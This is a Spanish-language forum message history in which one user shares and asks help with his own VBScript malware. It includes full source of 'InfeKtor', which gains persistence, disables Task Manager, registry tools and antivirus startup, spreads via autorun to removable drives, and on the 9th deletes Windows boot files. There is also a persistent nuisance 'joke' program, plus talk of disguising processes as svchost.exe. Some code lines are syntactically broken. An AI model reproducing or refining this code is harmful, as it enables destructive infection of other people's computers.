Mensajes

no estaría de más que redactes una pregunta como debe de ser

Me he olvidado la bola de cristal en la casa de un familiar, así que no puedo adivinar nada en este momento 

Manipular fotos en que sentido man??

ejecutarlas, copiarlas, moverlas, cambiarles el formato? etc...

Tiene que ver con script, veradad.....? 



SALUD.O.S

Ahora que lo leo bien....

Me falto copiar el autorun en las unidades extraibles.!!   

todavia esta en construccion, todos los dias trabajo un poquitito en ellos, si tengo tiempo claro..



SALUD.O.S

Ahora entiendo porque el problema con el sleep .....

Es que en vbs, si al sleep le pones esperas muy grandes... muere  .

Es verad jaja pero al exe tambien se lo cierra y listo, fue..

La idea es ponerle el nombre de algu nombre como svchost.exe o winlogon, explorer.exe 

Es asi nomas, la idea es dejar las mejores funciones para los virus y demas..

tengo tres proyectos: dos virus y una broma.. InfeKtor, V-InfeKtor y K-Joke 

Este es el del InfeKtor :

Código [Seleccionar] Expandir

'-------------------------------------------------------_____##########____-------------------------------------------------
'0111001011011000111010010100000100010001100111011100100\--_--_--_--_--_--/0101011101001010010100100001000100100110001010011
'-------------------------------------------------------/   INFEKTOR 2.4  \-------------------------------------------------
'0101011101001010010100100001000100100110001010011011001\ +--+---+---+--+ /1001011011000111010010100000100010001100111011100
'-------------------------------------------------------/  By: Bakura182  \-------------------------------------------------
'0101100111010111010101011101001110001101010111110100100�������������������0101111101001000101011101000100100110001010010011
'---------------------------------------------------------------------------------------------------------------------------



'Aca defino todas las variables a usar

Dim Batch
Dim InfKFSOvar
Dim CodigoAutoR
Dim InfKWSSvar
Dim EjecChauIniW
Dim i
Dim x
Dim Uni

'Empiezo creando la carpeta que almacenara el virus InfeKtor

On error resume next

Set InfKFSOvar = CreateObject("Scripting.FileSystemObject")
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor"
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
'Se copia asi mismo
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
'Se crea el autorun con las opciones de abrir, explorar y escaneo falso de virus
Set CodigoAutoR = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf",True)
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "[Autorun]"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "shell\1=Abrir"
CodigoAutoR.WriteLine ";mpaF3AkDI2KK5awial3lK43w4Dl3JesLKrj0iL9DcsSo9waO2349wdlk"
CodigoAutoR.WriteLine "shell\1\command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";8lkakfo431kip3dsoe2Daw53dqJsDKKcJalJoof70osK43LKfC0UksswlLksZko5jkL5qsK434LiJe2j"
CodigoAutoR.WriteLine "shell\1\default=1"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9loe5200Ds49LIr8LqXckkKewpAc9oiskk0K4i2arwL30533o4Kdsrajsairwr38al"
CodigoAutoR.WriteLine "Shell\2=Explorar"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5jiie23AJa2awkakf28kDp
CodigoAutoR.WriteLine "Shell\2\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5ji
CodigoAutoR.WriteLine "Shell\5=Escanear virus"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "Shell\5\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9l53REsdSdf3f4gFw692oaA9al"
CodigoAutoR.WriteLine "1=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "2=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "5=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2A3Rsa3L"
CodigoAutoR.Close

'Se crea un bat que le a�ade atributos al virus y demas y que se los saca a otros.. jeje
'Volviendolos visibles para usuarios inexpertos y lograr asi que se autodestruyan el inicio de W
'sino a esperar hasta el nueve como mas abajo se vera

Set Batch = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat",True)
Batch.WriteLine "@echo off"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor"
Batch.WriteLine "attrib -h -r -s C:\IO.sys"
Batch.WriteLine "attrib -h -r -s C:\COMAND.com
Batch.WriteLine "attrib -h -r -s C:\NTDETECT.bat"
Batch.WriteLine "attrib -h -r -s C:\boot.ini"
Batch.WriteLine "attrib -h -r -s C:\MSDOS.sys"
Batch.WriteLine "attrib -h -r -s C:\bootfont.bin"
Batch.WriteLine "attrib -h -r -s C:\ntldr.sys"
Batch.WriteLine "attrib -h -r -s C:\pagefile.sys"
Batch.WriteLine "attrib -h -r -s C:\IO.sys "
Batch.WriteLine "attrib -h -r -s C:\AUTOEXEC.bat"
Batch.WriteLine "attrib -h -r -s C:\CONFIG.sys"
Batch.WriteLine "attrib -h -r -s C:\Windows\WIN.ini
Batch.WriteLine "attrib -h -r -s C:\Windows\SYSTEM.ini
Batch.WriteLine "attrib -a -h -r -s C:\Config.Msi"
Batch.WriteLine "attrib -a -h -r -s C:\RECYCLER"
Batch.WriteLine "attrib -a -h -r -s C:\System Volume Information"
Batch.WriteLine "exit"
Batch.close

'tengo que pasarlo a VBS mejor, no conviene ejecutar un bat ya que saltaria la consola y es muy llamativa..

'Ejecuto el bat

Set InfKWSSvar = CreateObject("WScript.Shell")
InfKWSSvar.Run "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"


'Y lo borro, ya que es muy facil editarlo y hacer lo contrario... ��'


InfKFSOvar.DeleteFile "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"


'Se guarda en el registro y otras opciones
InfKWSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden",0,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD")

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",2,"REG_DWORD")

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden",1,"REG_DWORD")

InfKWSSvar.regwrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1")

InfKWSSvar.regwrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD")

'Aca quiero agregar la mayor cantidad de AV para que no se inicien, solo llevo dos =( ..

InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NAV Agent"

InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kav"



'Si el dia es distinto a 9 entonces procede a crear una copia de si mismo con un nombre diferente, sino borra los archivos de arranque de windows, sin ellos windows no arranca


if Day(Now()) <> 9 then
Wscript.sleep 10000
Randomize
Azar = Int(Rnd * 10)
If Azar = "0" Then Nombre = "Password Generator"
If Azar = "1" Then Nombre = "Install K-raoke"
If Azar = "2" Then Nombre = "SysUtils"
If Azar = "3" Then Nombre = "UnistallerX"
If Azar = "4" Then Nombre = "Mk2"
If Azar = "5" Then Nombre = ""
If Azar = "6" Then Nombre = "Messenger error"
If Azar = "7" Then Nombre = "Iexplorer"
If Azar = "8" Then Nombre = "Abu"
If Azar = "9" Then Nombre = "EasyWeb"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Mis documentos" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Adminstrador\Escritorio" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\All Users\Escritorio
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\Usuario\Escritorio"," & Nombre & ".exe"

'Tendria que crear algo que despues ejecute a cualquiera de ellos, sino es en vano jaja

else
On error resume next
InfKFSOvar.DeleteFile "C:\IO.sys"
InfKFSOvar.DeleteFile "C:\AUTOEXEC.bat"
InfKFSOvar.DeleteFile "C:\CONFIG.sys"
InfKFSOvar.DeleteFile "C:\COMAND.com"
InfKFSOvar.DeleteFile "C:\NTDETECT.bat"
InfKFSOvar.DeleteFile "C:\Windows\WIN.ini"
InfKFSOvar.DeleteFile "C:\boot.ini"
InfKFSOvar.DeleteFile "C:\MSDOS.sys"
InfKFSOvar.DeleteFile "C:\bootfont.bin"
InfKFSOvar.DeleteFile "C:\ntldr.sys"
InfKFSOvar.DeleteFile "C:\pagefile.sys"
InfKFSOvar.DeleteFile "C:\Windows\SYSTEM.ini"
InfKFSOvar.DeleteFolder "C:\Config.Msi"
InfKFSOvar.DeleteFolder "C:\RECYCLER"
InfKFSOvar.DeleteFolder "C:\System Volume Information".DeleteFile "C:\IO.sys"
End if
'Crea otro bat que apaga el ordenador y  avisa que ha sido victima del infeKtor (tarde el aviso pero bueh,ja)

Set ChauIniW = InfKFSOvar.CreateTextFile ".\Salud.o.s.bat,True"
ChauIniW.Writeline "@echo off"
ChauIniW.Writeline "Shutdown -s -t 5 -c Has_Sido_Victima_Del_InfeKtor..."
ChauIniW.Writeline "Exit"
ChauIniW.Close
Set EjecChauIniW = CreateObject("WScript.Shell")
EjecChauIniW.Run ".\Salud.o.s.bat"
End if
'Propagacion por unidades
' he aqui el ejemplo tuyo de propagacion

Set FSOvar = createobject("scripting.filesystemobject")
Set uni = FSOvar.drives

For each x in uni
If x.driveletter <> "A" and x.drivetype = 1 then
FSOvar.copyfile wscript.scriptfullname, x.driveletter &":\"
msgbox "contagio en " & x.driveletter
End If
Next

Debo remplazar el bat por codigo en vbs , con los atributos en 39, pero lo hago despues, estoy muy ocupado con el estudio jaja



SALUD.O.S

Buenas, aca dejando el source de una simple broma en vbs que consta en ejecutar en pantalla el block de notas y escribir en el que esta infectado,etc (Ustedes son libres de moficarlo), es bastante molesto andar cerrando el block cada 1 minuto..

Las personas con menos conocimientos creeran que es alguna clase de virus o troyano que lo ha infectado. 
Buena aca el code, es bastante simple :

Código [Seleccionar] Expandir

Private Sub Form_Load()

'Declaro algunas variables

Dim Molesto
Dim WSSvar
Dim i
Dim FSOvar

On Error Resume Next

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"     

              'Se agrega al regsitro
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

              'En este tambien, deben dejar solo uno, es opcional

Set FSOvar = CreateObject("Scripting.FileSystemObject")
FSOvar.CopyFile ".\SexDonkey.exe", "C:\Windows\System32\K-Joke.exe"

              ' Se copia asi mismo, en la ruta donde sera buscado luego en el registro

Do
Wscript.sleep 70000   
      ' No hara nada por 1,10 minutos y despues ejecuta el block de notas

Set Molesto = WSSvar.exec("Notepad.exe")
Wscript.sleep 1500      ' Le da tiempo al notepad para que se termine de abrir

WSSvar.AppActivate Molesto.processid
        ' Esto hara que coloque las palabras sobre el block de notas

Wscript.sleep 700                   'Esto es para asegurarse de que lo hara sobre el
WSSvar.AppActivate Molesto.processid

         'Envia pulsaciones de teclado que se escribiran sobre el notepad.
         'ustedes pueden escribir lo que quieran que les aparecera, como dice ahi.
WSSvar.SendKeys "Has sido infeKtado por mi V-InfeKtor"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "Eliminame si puedes..."
WSSvar.SendKeys "{ENTER}"
Wscript.sleep 670
WSSvar.SendKeys ".___"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     #       #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\  #   #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/  #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "##=/      #@"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# .-#     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/   #  #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#      #  #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#     #   #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#0oo./    #       #"
Loop       'Se repite nuevamente
 

End Sub


pueden hacer este agregado si quieren o bien cambiarlo por:

Código [Seleccionar] Expandir


Dim WSSvar

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

pero en caso de agregarlo se iniciarian dos..

jaja no se pregunten porque tiene ese nombre "sexDonkey" 

voy a seguir trabajando en el, espero que quede bueno.




SALUD.O.S

... Es que queria pasarlo de VBS a VB, porque veo que los script son faciles de sacar y por el solo hecho de poder guardarlo en EXE; con los exe se puede jugar un poco mas    

Ahora posteare en scripting el source de una broma que estoy programando en VBS que pase a VB (sin la funcion Wscript.sleep    ).. la dejare para que me ayuden.. o ayudes porque veo que eres el unico que responde..

de todas maneras igual posteare la misma pregunta en scripting.



SALUD.O.S

Bastante completo tu ejemplo ssccaann43 

Aprovechando el hilo de la conversacion, como hago un temporizador que no sea el tipico

Código [Seleccionar] Expandir


Dim i

i = 1
do until i = 100000
i = i + 1
end if
loop

se que el Wscript.sleep no funciona porque lo he intentado pero no funciona..

hay??

Gracias de antemano



SALUD.O.S

¿como hago para que el usuario de mi programa le de a un botón y al apretarlo
el programa cada vez que inicie sesión de windows se ejecute?

Espero que esto te sirva :

Código [Seleccionar] Expandir


Dim WSSvar

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NOMBRE", "RUTA_DE_TU_ARCHIVO\nombrearchivo.exe"
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NOMBRE", "RUTA_DE_TU_ARCHIVO\nombrearchivo.exe"

Es una entrada en HKCU y otra en HKLM, es en vbs pero igual sirve para VB..

Si lo que quieres hacer es asignar un boton que haga que tu programa se inicie con windows solo debes colocar un boton y agregar eso.. obviamente editando donde dice NOMBRE y etc..  ¬¬'



SALUD.O.S

Buenas tardes, Me pregunto como es el script correcto para reconocer si hay una o unas unidades extraibles como pendrive, hd externos, tarjetas, etc...

he hecho este codigo pero no me funciona.. :

Código [Seleccionar] Expandir


Dim FSOvar
Dim Uni

Set FSOvar = createobject("scripting.filesystemobject")
Set Uni = FSOvar.drives
For each x in Uni do
L = x.Drivesletter
if L = true then Objfso.copyfile ".\archivo.vbs",&L&":\"
msgBox "contagio en " &L&
exit do
End if
next

Esta bien asi.?? 

He intendao varios codigos pero creo que este es el mas estable.. Si funcionara... 

Si alguien puede ayudarme se lo agradeceria..



SALUD.O.S

Ha y con respecto a ejecutarlo en forma de Script (VBS) Preferiria tenerlo en EXE ya que el proceso de WSH es muy delator 

Y de ahi inyectarlo me entiendes?



SALUD.O.S

.. Se que voy bien...

He inten... como exe un ejemplo de reproduccion en los pen-drives o cualquier unidad, es una pavada, si quieren lo posteo. es un ejemplo mediocre pero actualmente esta bastante bien.

Ese ejemplo estaba en mi pendrive, mi virus tambien lo tiene pero de la manera mas correcta  , El proyecto esta en mi casa.

Gracias por el manual, todo es bienvenido; pero esa es la unica forma de reproduccion que se me ocurre. que se copie asi mismo constantemente en todas las unidades.

Mas tarde o mañana te subo el codigo completo, para que me ayudes listo man?

Es que no tengo internet y estoy en la escuela; uso el internet de la escula o voy a la casa de una amiga, por eso tardo en resp.


SALUD.O.S